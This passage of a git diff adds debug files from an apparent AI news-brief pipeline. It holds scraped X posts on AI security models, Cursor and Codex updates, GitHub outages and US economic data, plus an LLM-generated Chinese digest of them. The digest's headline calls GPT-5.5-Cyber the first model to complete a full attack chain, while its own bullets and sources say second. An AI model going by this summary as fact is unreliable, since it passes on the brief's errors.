"Pluvio9yte", "name": "雪踏乌云", "published_at": "2026-04-30T16:18:34+00:00", "title": "A÷你认真的吗,38分钟打满了😅", "url": "https://x.com/Pluvio9yte/status/2049886136580137378"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-30T16:02:50+00:00", "title": "RT by @charliebilello: Microsoft Revenues (Billions)...\n2026 (est): 354\n'25: 305\n'24: 262\n'23: 228\n'22: 203\n'21: 185\n'20: 153\n'19: 134\n'18: 118\n'17: 102\n'16: 95\n'15: 88\n'14: 93\n'13: 83\n'12: 73\n'11: 72\n'10: 67\n'09: 59\n'08: 62\n'07: 58\n'06: 46\n'05: 41\n'04: 38\n'03: 34\n'02: 31\n'01: 27", "url": "https://x.com/charliebilello/status/2049882175433015544"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-04-30T16:02:00+00:00", "title": "Naval 讲了一句让我转身就去打开 Cursor 的话\n\n电子游戏给你的是假奖励真多巴胺 \n\nvibe coding 给你的是真奖励真多巴胺\n\n游戏让你卡在能力边缘,但世界是别人造的,迟早通关 \n\nvibe coding 底下跑的是图灵机,无界,目标自己定,做出来的东西是真的\n\n他一批朋友因此\"消失了\",钻进去做自己想了很多年的那个 app \n\n他自己也在一个人重做 Airchat\n\n而最难的不是写代码,是知道你要什么", "url": "https://x.com/GoSailGlobal/status/2049881966850499058"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-30T15:59:15+00:00", "title": "RT by @GaryMarcus: One underdiscussed part of the Google-DOD deal is how it blindsided the company’s own employees.\n\nOne told @cogcelia that senior management had repeatedly insisted Google wouldn’t cave to the Pentagon’s demands — which proved not to be true.\n\nhttps://www.transf", "url": "https://x.com/GaryMarcus/status/2049881272990789710"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-04-30T15:58:18+00:00", "title": "Mitchell(Vagrant、Terraform、Ghosty 的作者)今天宣布离开 GitHub \n\nGitHub 第 1299 号用户,注册 18 年,几乎没断过一天 \n\n他说写完离别帖,眼泪滴到了键盘上\n\n不是矫情,是 GitHub 真的快不能用了\n\n最近两周连续翻车 \n\n1️⃣ 4 月 23 日 merge queue 出 bug,2800 多个 PR 被静默撤回,已经合进主干的代码凭空消失 \n\n2️⃣ 拉取请求 API 整整一个工作日打不开 \n\n3️⃣ 一个 RCE 漏洞,黑客一个 git push -O 就能访问上百万仓库 TanStac", "url": "https://x.com/GoSailGlobal/status/2049881037547999546"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-30T15:54:48+00:00", "title": "RT by @charliebilello: Google Revenues (Billions)...\n2026 (est): 476\n2025: 403\n2024: 350\n2023: 307\n2022: 283\n2021: 258\n2020: 183\n2019: 162\n2018: 137\n2017: 111\n2016: 90\n2015: 75\n2014: 66\n2013: 56\n2012: 46\n2011: 38\n2010: 29\n2009: 24\n2008: 22\n2007: 17\n2006: 11\n2005: 6.1\n2004: 3.2\n$G", "url": "https://x.com/charliebilello/status/2049880154629878151"}, {"handle": "dingyi", "name": "Ding", "published_at": "2026-04-30T15:37:12+00:00", "title": "The future of product design.", "url": "https://x.com/dingyi/status/2049875727689146789"}, {"handle": "realNyarime", "name": "奶昔", "published_at": "2026-04-30T15:31:15+00:00", "title": "所以GPT的Plus和Team额度差多少", "url": "https://x.com/realNyarime/status/2049874226778452072"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-30T15:31:09+00:00", "title": "RT by @GaryMarcus: Big Tech’s $700 billion spending on AI this year is called the ‘greatest capital misallocation in history’ https://trib.al/qUQIbrJ", "url": "https://x.com/GaryMarcus/status/2049874202983870910"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-04-30T15:25:23+00:00", "title": "ChatGPT 还在让你复制粘贴的时候,Gemini 已经把活儿干完了 \n\n昨天 Google 悄悄上线了一个功能:在对话框里直接生成文件,你让他帮你写一份 budget,它是真的给你导出 \n\nExcel 支持的格式一口气拉满: PDF / Word / Excel Google Docs / Sheets / Slides LaTeX / CSV / TXT / RTF / Markdown \n\n操作只有两步: \n1)跟它说「帮我做一份 XX」 \n2)点导出 → 下载到本地或同步进 Drive \n\n意味着什么? \n\n普通用户从「问 AI」到「拿到", "url": "https://x.com/GoSailGlobal/status/2049872749850665004"}, {"handle": "CuiMao", "name": "CuiMao", "published_at": "2026-04-30T14:47:31+00:00", "title": "R to @CuiMao: 本视频由seedance2生成,切勿当真!", "url": "https://x.com/CuiMao/status/2049863222195572817"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-04-30T14:44:27+00:00", "title": "x.com/i/article/204974126036…", "url": "https://x.com/GoSailGlobal/status/2049862449474740224"}, {"handle": "realNyarime", "name": "奶昔", "published_at": "2026-04-30T14:23:38+00:00", "title": "R to @realNyarime: 4月29日,据广州市天河区投资服务中心官方公众号“投资天河”发布消息,科技巨头谷歌已于28日正式签订合同,入驻位于天河CBD珠江新城的城市地标广州国际金融中心(西塔),将率先落地跨境数智赋能服务创新项目,预计今年第三季度正式投入运营。谷歌方面将联合各方优势资源,推出多项创新科技服务。\n\n据了解,谷歌将在广州天河整合全球领先的科技资源,为内地跨境电商企业提供近距离的海外精准营销、国际化品牌打造、数字化技术赋能、全球流量对接等全链条服务,谷歌依托其在全球领先的科技实力,不仅可帮助企业降低出海成本、提升运营效率,推动“中国", "url": "https://x.com/realNyarime/status/2049857210659070441"}, {"handle": "realNyarime", "name": "奶昔", "published_at": "2026-04-30T14:22:45+00:00", "title": "据羊城晚报报道,谷歌落地广州,入驻位于天河 CBD 珠江新城地标广州国际金融中心(西塔)\n\n将率先落地跨境数智赋能服务创新项目,主打跨境电商业务,预计今年 Q3 正式投入运营\n谷歌方面将联合各方优势资源,推出多项国内首创科技服务", "url": "https://x.com/realNyarime/status/2049856990957236483"}, {"handle": "HarryStebbings", "name": "Harry Stebbings", "published_at": "2026-04-30T14:03:29+00:00", "title": "R to @HarryStebbings: Spotify: https://open.spotify.com/episode/2KjX2zs4ZELBidXJX9m9vK\nYoutube: https://youtu.be/aXToQKc430c\nApple Podcasts: https://podcasts.apple.com/us/podcast/20vc-anthropic-raises-%2445bn-but-falls-short-on-compute/id958230465?i=1000764648424", "url": "https://x.com/HarryStebbings/status/2049852141334904978"}, {"handle": "HarryStebbings", "name": "Harry Stebbings", "published_at": "2026-04-30T14:03:29+00:00", "title": "This podcast will make you smarter than Leopold Aschenbrenner at an AI investing conference.\n\n- Anthropic Raises $45BN but Falls Short on Compute\n- Are OpenAI Back in the Game with GPT5.5 & Codex?\n- Why Google is a Bigger Buy Than Ever Before\n- China Blocks Manus $2BN Deal to Met", "url": "https://x.com/HarryStebbings/status/2049852139690754293"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-30T13:36:52+00:00", "title": "Jerome Powell held 63 press conference as Fed chairman and over that time there wasn't a single question about the 40% money supply spike in 2020-21 or $18 trillion increase in the national debt during his tenure as the root causes of inflation.\n\nThat's either unbelievable incomp", "url": "https://x.com/charliebilello/status/2049845442842603574"}, {"handle": "Pluvio9yte", "name": "雪踏乌云", "published_at": "2026-04-30T13:35:30+00:00", "title": "补充一点我的经历:先拿到第一单,然后作为脱敏案例,后续拿下新客户也会更容易。", "url": "https://x.com/Pluvio9yte/status/2049845097924342258"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-04-30T13:24:32+00:00", "title": "RT by @GoSailGlobal: x.com/i/article/204984109084…", "url": "https://x.com/GoSailGlobal/status/2049842340056174762"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-30T13:24:05+00:00", "title": "RT by @charliebilello: Manias, Panics, and All-Time Highs (The Week in Charts)...", "url": "https://x.com/charliebilello/status/2049842225970852313"}, {"handle": "realNyarime", "name": "奶昔", "published_at": "2026-04-30T13:13:12+00:00", "title": "这下压力给到CAAC了,\n不过当年不予公开的原因是,可能危及国家安全、社会稳定😣", "url": "https://x.com/realNyarime/status/2049839485610029262"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-30T13:08:14+00:00", "title": "RT by @charliebilello: The Fed's preferred measure of inflation (Core PCE) came in at 3.2% in March, the highest level since November 2023. This was the 61st consecutive reading above the Fed's 2% target level. There will be no Fed rate cut in June and one could make a strong cas", "url": "https://x.com/charliebilello/status/2049838235866566668"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-30T13:02:00+00:00", "title": "RT by @charliebilello: Remember this the next time you find yourself in a turbulent market with bad news:\n1. You are a long-term investor\n2. Diversified portfolios are resilient\n3. Down markets present opportunities\n4. Corrections and bear markets have always given way to a recov", "url": "https://x.com/charliebilello/status/2049836667650089194"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-30T13:01:56+00:00", "title": "RT by @charliebilello: Gas prices in the US have moved up to $4.30 per gallon, their highest level since July 2022. The 44% spike over the last 9 weeks ($2.98/gallon to $4.30/gallon) is the biggest we've seen in the past 30 years.", "url": "https://x.com/charliebilello/status/2049836652181307421"}] diff --git a/data/x_brief/debug/20260501_092840_l1_stage2_output.json b/data/x_brief/debug/20260501_092840_l1_stage2_output.json new file mode 100644 index 0000000..02474eb --- /dev/null +++ b/data/x_brief/debug/20260501_092840_l1_stage2_output.json @@ -0,0 +1,246 @@ +{ + "raw_text": "\n\n{\"headline\":\"GPT-5.5-Cyber成首个通过完整攻击链的AI安全模型,Codex升级抢非编码用户\",\"trending_keywords\":[\"GPT-5.5-Cyber\",\"Cursor Security Review\",\"Claude Security公测\",\"vibe coding\",\"S&P 500 7200\",\"Owl Alpha\"],\"themes\":[{\"id\":\"t1\",\"title\":\"AI安全模型分水岭:GPT-5.5-Cyber通过完整攻击链\",\"subtitle\":\"OpenAI首发网络安全前沿模型,Anthropic Mythos不再是唯一\",\"priority\":\"P0\",\"bullets\":[\"GPT-5.5-Cyber成为第二个能端到端完成整个攻击链的模型,首个是Anthropic的Mythos\",\"David Sacks:Mythos不是魔法也不是末日武器,只是自动化网络任务的开始\",\"OpenAI将在未来几天向关键网络防御者推出该模型\"],\"samples\":[{\"text\":\"GPT-5.5(网络攻击版本)成功完成AI Security Institute设计的多步网络攻击模拟\",\"url\":\"https://x.com/sama/status/2049712078836170843\",\"handle\":\"sama\",\"date\":\"2026-04-30\"},{\"text\":\"是时候揭开Mythos的神秘面纱了,它只是众多能够自动化网络安全任务的模型中的第一个\",\"url\":\"https://x.com/DavidSacks/status/2049907993588769006\",\"handle\":\"DavidSacks\",\"date\":\"2026-04-30\"},{\"text\":\"OpenAI的GPT-5.5模型(cyber版本)成功完成多步网络攻击模拟,成为第二个能端到端完成整个攻击链的模型\",\"url\":\"https://x.com/berryxia/status/2049987993193402677\",\"handle\":\"berryxia\",\"date\":\"2026-04-30\"}]},{\"id\":\"t2\",\"title\":\"Cursor安全能力升级:企业级代码审查进入自动化\",\"subtitle\":\"Security Review Agent全面开放,脆弱性扫描集成Slack\",\"priority\":\"P0\",\"bullets\":[\"Cursor Security Review现支持Teams和Enterprise计划\",\"两种Agent:Security Reviewer检查每个PR的漏洞并留评论;Vulnerability Scanner定期扫描代码库并发布到Slack\",\"开源三个入门项目:coding agent CLI、prototyping tool、agent-powered kanban board\"],\"samples\":[{\"text\":\"Cursor Security Review现面向Teams和Enterprise计划开放,运行两类持续运行的Agent\",\"url\":\"https://x.com/cursor_ai/status/2049926283061035254\",\"handle\":\"cursor_ai\",\"date\":\"2026-04-30\"},{\"text\":\"正在改进驱动Cursor Security Review的运行时、 harness和模型,以提供强大的开箱即用体验\",\"url\":\"https://x.com/cursor_ai/status/2049926287439929475\",\"handle\":\"cursor_ai\",\"date\":\"2026-04-30\"}]},{\"id\":\"t3\",\"title\":\"Sam Altman:Codex迎来ChatGPT时刻\",\"subtitle\":\"非编码计算机工作升级42%,Mac成为AI开发首选平台\",\"priority\":\"P1\",\"bullets\":[\"Codex大幅升级:Computer Use运行速度提升42%,支持非编码的日常计算机工作\",\"Perplexity采用GPT-5.5作为默认编排模型,Mac成为企业级AI助手首选平台\",\"Sam Altman:感觉Codex正在经历ChatGPT时刻\"],\"samples\":[{\"text\":\"Codex今天重大升级!尝试用它来做非编码的计算机工作\",\"url\":\"https://x.com/sama/status/2049946120441520624\",\"handle\":\"sama\",\"date\":\"2026-04-30\"},{\"text\":\"Perplexity等领先的AI开发者选择Mac作为构建企业级AI助手的首选平台\",\"url\":\"https://x.com/AravSrinivas/status/2050007015616135365\",\"handle\":\"AravSrinivas\",\"date\":\"2026-05-01\"},{\"text\":\"感觉Codex正在经历ChatGPT时刻\",\"url\":\"https://x.com/sama/status/2049493609028923826\",\"handle\":\"sama\",\"date\":\"2026-04-29\"}]}],\"p0_events\":[{\"id\":\"p01\",\"title\":\"GPT-5.5-Cyber网络攻击测试通过\",\"meta\":\"OpenAI | Sam Altman\",\"summary\":\"OpenAI前沿网络安全模型GPT-5.5-Cyber成功完成AI Security Institute设计的多步网络攻击模拟,成为第二个端到端完成攻击链的模型\",\"url\":\"https://x.com/sama/status/2049712078836170843\"},{\"id\":\"p02\",\"title\":\"Cursor Security Review开放企业版\",\"meta\":\"Cursor | 2026-04-30\",\"summary\":\"Teams和Enterprise计划可用Security Reviewer和Vulnerability Scanner两类Agent,PR漏洞检查和Slack告警自动化\",\"url\":\"https://x.com/cursor_ai/status/2049926283061035254\"},{\"id\":\"p03\",\"title\":\"Claude Security公测\",\"meta\":\"Anthropic | Berryxia\",\"summary\":\"Claude Security现已进入公测阶段,可指向代码仓库获取漏洞发现结果并原地修复\",\"url\":\"https://x.com/berryxia/status/2049998972484567491\"},{\"id\":\"p04\",\"title\":\"S&P 500首破7200\",\"meta\":\"Charlie Bilello | 2026-04-30\",\"summary\":\"标普500首次站上7200关口,过去一年从5600涨至7200,五年4200,十年2100\",\"url\":\"https://x.com/charliebilello/status/2049913908861792603\"},{\"id\":\"p05\",\"title\":\"Stripe Link CLI发布\",\"meta\":\"Stripe | Berryxia\",\"summary\":\"Agent支付基础设施:单次凭证+同步人工审批,Claude买礼物需FaceID确认\",\"url\":\"https://x.com/berryxia/status/2049985476334100833\"},{\"id\":\"p06\",\"title\":\"Karpathy:LLMs远不止加速既有工作\",\"meta\":\"Andrej Karpathy | Sequoia Ascent 2026\",\"summary\":\"Karpathy在 Sequoia Ascent 2026演讲:LLM新视野不仅是加速coding,还包括menugen、talkie等全新交互形态\",\"url\":\"https://x.com/karpathy/status/2049903821095354523\"}],\"top_quotes\":[{\"id\":\"q1\",\"quote\":\"Mythos is not magic. It's not a doomsday device. It's the first of many models that can automate cyber tasks (just like coding).\",\"speaker\":\"David Sacks\",\"date\":\"2026-04-30\",\"note\":\"澄清对Anthropic Mythos的过度解读,强调AI安全模型的实用价值\",\"url\":\"https://x.com/DavidSacks/status/2049907993588769006\"},{\"id\":\"q2\",\"quote\":\"The first theme I tried to push on is that LLMs are about a lot more than just speeding up what existed before (e.g. coding).\",\"speaker\":\"Andrej Karpathy\",\"date\":\"2026-04-30\",\"note\":\"Sequoia Ascent 2026演讲核心观点:LLMs将催生全新人机交互形态\",\"url\":\"https://x.com/karpathy/status/2049903821095354523\"},{\"id\":\"q3\",\"quote\":\"feels like codex is having a chatgpt moment\",\"speaker\":\"Sam Altman\",\"date\":\"2026-04-29\",\"note\":\"Sam Altman对Codex产品阶段的判断,暗示AI编程工具临界点临近\",\"url\":\"https://x.com/sama/status/2049493609028923826\"}],\"category_updates\":[{\"id\":\"c1\",\"title\":\"Grok Image Beta上线\",\"subtitle\":\"xAI创意Agent网页版灰度中\",\"level\":\"P1\",\"items\":[{\"text\":\"Grok Image Agent网页版Beta已上线付费用户灰度推送,可在无限开放画布独立完成规划→生成→编辑→迭代全流程\",\"url\":\"https://x.com/berryxia/status/2050002308759695561\"}]},{\"id\":\"c2\",\"title\":\"OpenGeometry开源发布\",\"subtitle\":\"建筑CAD领域的缺失关键层\",\"level\":\"P1\",\"items\":[{\"text\":\"Text→Floorplans→CAD→Render完整打通,从文本直接生成精准BREP CAD模型,Three.js实时渲染\",\"url\":\"https://x.com/berryxia/status/2050015402647027808\"}]},{\"id\":\"c3\",\"title\":\"GitHub两周连出三次故障\",\"subtitle\":\"第1299号用户含泪告别\",\"level\":\"WARN\",\"items\":[{\"text\":\"merge queue bug导致2800+PR静默撤回、RCE漏洞、黑客可访问上百万仓库\",\"url\":\"https://x.com/GoSailGlobal/status/2049881037547999546\"}]},{\"id\":\"c4\",\"title\":\"谷歌入驻广州天河CBD\",\"subtitle\":\"Q3落地跨境数智服务\",\"level\":\"P2\",\"items\":[{\"text\":\"谷歌入驻广州国际金融中心(西塔),主攻跨境电商,预计Q3正式运营\",\"url\":\"https://x.com/realNyarime/status/2049856990957236483\"}]},{\"id\":\"c5\",\"title\":\"Naval论vibe coding\",\"subtitle\":\"真奖励vs假多巴胺\",\"level\":\"P1\",\"items\":[{\"text\":\"游戏给假奖励真多巴胺,vibe coding给真奖励真多巴胺,目标是自己的,做的东西是真的\",\"url\":\"https://x.com/GoSailGlobal/status/2049881966850499058\"}]},{\"id\":\"c6\",\"title\":\"Andrew Ng新课程\",\"subtitle\":\"AI Prompting for Everyone\",\"level\":\"P2\",\"items\":[{\"text\":\"2026年提示词技术与2022年完全不同,推出新课程帮助各技能水平用户成为AI power user\",\"url\":\"https://x.com/AndrewYNg/status/2049886895530967534\"}]}],\"risk_signals\":[{\"id\":\"r1\",\"level\":\"HIGH\",\"title\":\"GitHub基础设施风险\",\"detail\":\"两周内merge queue bug、RCE漏洞、API宕机频发,连18年老用户都含泪告别,开发者需警惕\"},{\"id\":\"r2\",\"level\":\"HIGH\",\"title\":\"美国汽油价格9周暴涨44%\",\"detail\":\"从$2.98/gallon飙升至$4.30/gallon,创30年最大涨幅,加州突破$6.00/gallon\"},{\"id\":\"r3\",\"level\":\"MID\",\"title\":\"Core PCE通胀3.2%\",\"detail\":\"3月核心PCE达3.2%,创2023年11月以来新高,连续61个月高于美联储2%目标,6月降息预期渺茫\"},{\"id\":\"r4\",\"level\":\"MID\",\"title\":\"美国FCC拟撤销中资运营商授权\",\"detail\":\"提议禁止Verizon、AT&T等与中资运营商互联,电信、联通、移动、中信美国业务面临出局风险\"},{\"id\":\"r5\",\"level\":\"OPP\",\"title\":\"AI写作代码的调试冗余风险\",\"detail\":\"Gary Marcus:agentic code容易产生难以调试的冗余、安全漏洞、数据库误删等问题\"},{\"id\":\"r6\",\"level\":\"OPP\",\"title\":\"科技股估值争议\",\"detail\":\"Gary Marcus转发批评:Big Tech今年AI领域$7000亿投资是历史上最大的资本错配\"}]}", + "parsed_modules": { + "headline": "GPT-5.5-Cyber成首个通过完整攻击链的AI安全模型,Codex升级抢非编码用户", + "trending_keywords": [ + "GPT-5.5-Cyber", + "Cursor Security Review", + "Claude Security公测", + "vibe coding", + "S&P 500 7200", + "Owl Alpha" + ], + "themes": [ + { + "id": "t1", + "title": "AI安全模型分水岭:GPT-5.5-Cyber通过完整攻击链", + "subtitle": "OpenAI首发网络安全前沿模型,Anthropic Mythos不再是唯一", + "priority": "P0", + "bullets": [ + "GPT-5.5-Cyber成为第二个能端到端完成整个攻击链的模型,首个是Anthropic的Mythos", + "David Sacks:Mythos不是魔法也不是末日武器,只是自动化网络任务的开始", + "OpenAI将在未来几天向关键网络防御者推出该模型" + ], + "samples": [ + { + "text": "GPT-5.5(网络攻击版本)成功完成AI Security Institute设计的多步网络攻击模拟", + "url": "https://x.com/sama/status/2049712078836170843", + "handle": "sama", + "date": "2026-04-30" + }, + { + "text": "是时候揭开Mythos的神秘面纱了,它只是众多能够自动化网络安全任务的模型中的第一个", + "url": "https://x.com/DavidSacks/status/2049907993588769006", + "handle": "DavidSacks", + "date": "2026-04-30" + }, + { + "text": "OpenAI的GPT-5.5模型(cyber版本)成功完成多步网络攻击模拟,成为第二个能端到端完成整个攻击链的模型", + "url": "https://x.com/berryxia/status/2049987993193402677", + "handle": "berryxia", + "date": "2026-04-30" + } + ] + }, + { + "id": "t2", + "title": "Cursor安全能力升级:企业级代码审查进入自动化", + "subtitle": "Security Review Agent全面开放,脆弱性扫描集成Slack", + "priority": "P0", + "bullets": [ + "Cursor Security Review现支持Teams和Enterprise计划", + "两种Agent:Security Reviewer检查每个PR的漏洞并留评论;Vulnerability Scanner定期扫描代码库并发布到Slack", + "开源三个入门项目:coding agent CLI、prototyping tool、agent-powered kanban board" + ], + "samples": [ + { + "text": "Cursor Security Review现面向Teams和Enterprise计划开放,运行两类持续运行的Agent", + "url": "https://x.com/cursor_ai/status/2049926283061035254", + "handle": "cursor_ai", + "date": "2026-04-30" + }, + { + "text": "正在改进驱动Cursor Security Review的运行时、 harness和模型,以提供强大的开箱即用体验", + "url": "https://x.com/cursor_ai/status/2049926287439929475", + "handle": "cursor_ai", + "date": "2026-04-30" + } + ] + }, + { + "id": "t3", + "title": "Sam Altman:Codex迎来ChatGPT时刻", + "subtitle": "非编码计算机工作升级42%,Mac成为AI开发首选平台", + "priority": "P1", + "bullets": [ + "Codex大幅升级:Computer Use运行速度提升42%,支持非编码的日常计算机工作", + "Perplexity采用GPT-5.5作为默认编排模型,Mac成为企业级AI助手首选平台", + "Sam Altman:感觉Codex正在经历ChatGPT时刻" + ], + "samples": [ + { + "text": "Codex今天重大升级!尝试用它来做非编码的计算机工作", + "url": "https://x.com/sama/status/2049946120441520624", + "handle": "sama", + "date": "2026-04-30" + }, + { + "text": "Perplexity等领先的AI开发者选择Mac作为构建企业级AI助手的首选平台", + "url": "https://x.com/AravSrinivas/status/2050007015616135365", + "handle": "AravSrinivas", + "date": "2026-05-01" + }, + { + "text": "感觉Codex正在经历ChatGPT时刻", + "url": "https://x.com/sama/status/2049493609028923826", + "handle": "sama", + "date": "2026-04-29" + } + ] + } + ], + "p0_events": [ + { + "id": "p03", + "title": "Claude Security公测", + "meta": "Anthropic | Berryxia", + "summary": "Claude Security现已进入公测阶段,可指向代码仓库获取漏洞发现结果并原地修复", + "url": "https://x.com/berryxia/status/2049998972484567491" + }, + { + "id": "p04", + "title": "S&P 500首破7200", + "meta": "Charlie Bilello | 2026-04-30", + "summary": "标普500首次站上7200关口,过去一年从5600涨至7200,五年4200,十年2100", + "url": "https://x.com/charliebilello/status/2049913908861792603" + }, + { + "id": "p05", + "title": "Stripe Link CLI发布", + "meta": "Stripe | Berryxia", + "summary": "Agent支付基础设施:单次凭证+同步人工审批,Claude买礼物需FaceID确认", + "url": "https://x.com/berryxia/status/2049985476334100833" + }, + { + "id": "p06", + "title": "Karpathy:LLMs远不止加速既有工作", + "meta": "Andrej Karpathy | Sequoia Ascent 2026", + "summary": "Karpathy在 Sequoia Ascent 2026演讲:LLM新视野不仅是加速coding,还包括menugen、talkie等全新交互形态", + "url": "https://x.com/karpathy/status/2049903821095354523" + } + ], + "top_quotes": [], + "category_updates": [ + { + "id": "c1", + "title": "Grok Image Beta上线", + "subtitle": "xAI创意Agent网页版灰度中", + "level": "P1", + "items": [ + { + "text": "Grok Image Agent网页版Beta已上线付费用户灰度推送,可在无限开放画布独立完成规划→生成→编辑→迭代全流程", + "url": "https://x.com/berryxia/status/2050002308759695561" + } + ] + }, + { + "id": "c2", + "title": "OpenGeometry开源发布", + "subtitle": "建筑CAD领域的缺失关键层", + "level": "P1", + "items": [ + { + "text": "Text→Floorplans→CAD→Render完整打通,从文本直接生成精准BREP CAD模型,Three.js实时渲染", + "url": "https://x.com/berryxia/status/2050015402647027808" + } + ] + }, + { + "id": "c3", + "title": "GitHub两周连出三次故障", + "subtitle": "第1299号用户含泪告别", + "level": "WARN", + "items": [ + { + "text": "merge queue bug导致2800+PR静默撤回、RCE漏洞、黑客可访问上百万仓库", + "url": "https://x.com/GoSailGlobal/status/2049881037547999546" + } + ] + }, + { + "id": "c4", + "title": "谷歌入驻广州天河CBD", + "subtitle": "Q3落地跨境数智服务", + "level": "P2", + "items": [ + { + "text": "谷歌入驻广州国际金融中心(西塔),主攻跨境电商,预计Q3正式运营", + "url": "https://x.com/realNyarime/status/2049856990957236483" + } + ] + }, + { + "id": "c5", + "title": "Naval论vibe coding", + "subtitle": "真奖励vs假多巴胺", + "level": "P1", + "items": [ + { + "text": "游戏给假奖励真多巴胺,vibe coding给真奖励真多巴胺,目标是自己的,做的东西是真的", + "url": "https://x.com/GoSailGlobal/status/2049881966850499058" + } + ] + }, + { + "id": "c6", + "title": "Andrew Ng新课程", + "subtitle": "AI Prompting for Everyone", + "level": "P2", + "items": [ + { + "text": "2026年提示词技术与2022年完全不同,推出新课程帮助各技能水平用户成为AI power user", + "url": "https://x.com/AndrewYNg/status/2049886895530967534" + } + ] + } + ], + "risk_signals": [ + { + "id": "r1", + "level": "HIGH", + "title": "GitHub基础设施风险", + "detail": "两周内merge queue bug、RCE漏洞、API宕机频发,连18年老用户都含泪告别,开发者需警惕" + }, + { + "id": "r2", + "level": "HIGH", + "title": "美国汽油价格9周暴涨44%", + "detail": "从$2.98/gallon飙升至$4.30/gallon,创30年最大涨幅,加州突破$6.00/gallon" + }, + { + "id": "r3", + "level": "MID", + "title": "Core PCE通胀3.2%", + "detail": "3月核心PCE达3.2%,创2023年11月以来新高,连续61个月高于美联储2%目标,6月降息预期渺茫" + }, + { + "id": "r4", + "level": "MID", + "title": "美国FCC拟撤销中资运营商授权", + "detail": "提议禁止Verizon、AT&T等与中资运营商互联,电信、联通、移动、中信美国业务面临出局风险" + }, + { + "id": "r5", + "level": "OPP", + "title": "AI写作代码的调试冗余风险", + "detail": "Gary Marcus:agentic code容易产生难以调试的冗余、安全漏洞、数据库误删等问题" + }, + { + "id": "r6", + "level": "OPP", + "title": "科技股估值争议", + "detail": "Gary Marcus转发批评:Big Tech今年AI领域$7000亿投资是历史上最大的资本错配" + } + ] + } +} \ No newline at end of file diff --git a/data/x_brief/debug/20260501_093436_l2_input.json b/data/x_brief/debug/20260501_093436_l2_input.json new file mode 100644 index 0000000..65e0fc7 --- /dev/null +++ b/data/x_brief/debug/20260501_093436_l2_input.json @@ -0,0 +1,63 @@ +{ + "target_indexes": [ + 168, + 80, + 35, + 68, + 66, + 60, + 16, + 248 + ], + "target_count": 8, + "targets": [ + { + "idx": 168, + "handle": "sama", + "url": "https://x.com/sama/status/2049712078836170843", + "title": "we're starting rollout of GPT-5.5-Cyber, a frontier cybersecurity model, to critical cyber defenders in the next few days.\n\nwe will work with the entire ecosystem and the government to figure out trusted access for cyber; we want to rapidly help secure companies/infrastructure." + }, + { + "idx": 80, + "handle": "DavidSacks", + "url": "https://x.com/DavidSacks/status/2049907993588769006", + "title": "It’s time to demystify Mythos. \n\nMythos is not magic. It’s not a doomsday device. It’s the first of many models that can automate cyber tasks (just like coding). \n\nOpenAI’s GPT-5.5-cyber can now do the same. And all the frontier models (including those from China) will be there within approximately 6 months. \n\nIt’s important to recognize that these models do not create vulnerabilities; they discover them. The bugs are already in the code. Using AI to discover and patch them will actually harden these systems.\n\nThe leap from pre-AI cyber to post-AI cyber means that there will be a big upgrade cycle. After that, however, the market is likely to reach a new equilibrium between AI-powered cyber-offense and AI-powered cyber-defense. \n\nObviously it’s important that cyber defenders get access before cyber attackers. That process is already underway but needs to happen quickly (see point above about Chinese models). \n\nUnlike Mythos, GPT-5.5-cyber appears not to be token constrained so it may be the first cyber model that defenders actually get to use." + }, + { + "idx": 35, + "handle": "berryxia", + "url": "https://x.com/berryxia/status/2049987993193402677", + "title": "David Sacks 在 X 平台上发布了一条推文,对 AI Security Institute 刚刚发布的公告进行了回应。\n\nAI Security Institute 宣布 OpenAI 的 GPT-5.5 模型(cyber 版本)成功完成了他们设计的“多步网络攻击模拟”。\n\n也成为第二个能端到端完成整个攻击链的模型(第一个是 Anthropic 的 Mythos)。 \n\n在推文中,David Sacks 表示,是时候揭开 Mythos 的神秘面纱了。\n\n他强调,Mythos 并非什么魔法,也不是末日武器,它只是众多能够自动化网络安全任务的模型中的第一个,就像 AI 已经能自动编写代码一样。\n\n现在 OpenAI 的 GPT-5.5-cyber 也达到了同样的水平,而所有前沿模型(包括来自中国的模型)预计将在大约 6 个月内跟上这一步伐。 \n\nDavid Sacks 进一步指出,这些模型并不会创造新的漏洞,它们只是发现已有的漏洞。\n\n代码中的 bug 本来就存在,使用 AI 来发现并修补它们,反而会让系统变得更加坚固。\n\n他认为,从前 AI 时代的网络安全到后 AI 时代的网络安全,将经历一次大规模的升级周期。\n\n升级完成后,市场很可能会达到 AI 驱动的网络进攻与 AI 驱动的网络防御之间的新的平衡状态。 \n\n他特别提醒,必须确保网络防御方先获得这些强大模型的访问权限,而非让攻击方抢先一步。\n\n这个过程已经启动,但需要迅速推进,尤其考虑到中国模型即将跟上的现实。\n\n此外,与 Mythos 不同,GPT-5.5-cyber 似乎没有 token 限制,因此它可能是第一个防御方能够实际投入使用的网络安全模型。 \n\nDavid Sacks 的整体立场是:AI 在网络攻击能力上的提升是不可避免的,但并非那么可怕,反而会推动整个网络安全生态的全面升级,前提是防御方必须领先一步。\n\n他通过这条推文,既澄清了外界对 Mythos 的过度神化,也为 OpenAI 的 GPT-5.5-cyber 提供了实际支持```​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​。" + }, + { + "idx": 68, + "handle": "cursor_ai", + "url": "https://x.com/cursor_ai/status/2049926283061035254", + "title": "Cursor Security Review is now available for Teams and Enterprise plans.\n\nRun two types of always-on agents:\n1. Security Reviewer checks every PR for vulnerabilities and leaves comments.\n2. Vulnerability Scanner runs scheduled scans of your codebase and posts findings in Slack." + }, + { + "idx": 66, + "handle": "cursor_ai", + "url": "https://x.com/cursor_ai/status/2049926287439929475", + "title": "R to @cursor_ai: We’re continuing to improve the runtime, harness, and models powering Cursor Security 